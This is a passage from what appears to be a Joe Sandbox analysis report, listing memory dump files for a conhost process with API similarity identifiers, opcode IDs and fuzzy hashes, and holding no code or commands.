                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memsetwcscatwcscpywcslen
                                                                                                              • String ID:
                                                                                                              • API String ID: 468205783-0
                                                                                                              • Opcode ID: e7bc34f2e161438cbd2b6771f1b4e38ebe37c0e9a940a9435b8862b618ff3714
                                                                                                              • Instruction ID: 214f64dd02556bee3488414a1567b53d6e3d252e92b5ac99abeda7d0ead7c09b
                                                                                                              • Opcode Fuzzy Hash: e7bc34f2e161438cbd2b6771f1b4e38ebe37c0e9a940a9435b8862b618ff3714
                                                                                                              • Instruction Fuzzy Hash: 11218522A1878565E721DF2BE45536AB7A0BF55788F488136DF4D87795EF7CE040C380
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000001C.00000002.2615765463.00007FF6B1A21000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B1A20000, based on PE: true
                                                                                                              • Associated: 0000001C.00000002.2615735917.00007FF6B1A20000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615796164.00007FF6B1A2B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615824283.00007FF6B1A2E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615842564.00007FF6B1A31000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                              • Associated: 0000001C.00000002.2615869918.00007FF6B1A35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_28_2_7ff6b1a20000_conhost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$EnterLeavefree
                                                                                                              • String ID:
                                                                                                              • API String ID: 4020351045-0
                                                                                                              • Opcode ID: e68b4ef9206e94961699919b94df18e8a3d550e6f3110bb3fd93949450f7db0f
                                                                                                              • Instruction ID: b35289d0c6e3d37923280b74ff71a2ce4d80aea05925b3c078ab7dbd4d1286cd
                                                                                                              • Opcode Fuzzy Hash: e68b4ef9206e94961699919b94df18e8a3d550e6f3110bb3fd93949450f7db0f
                                                                                                              • Instruction Fuzzy Hash: D2111E61F18602E2EB28CB5EF89027967A4AF94B89F545037CB0EC3254DF3CF8428394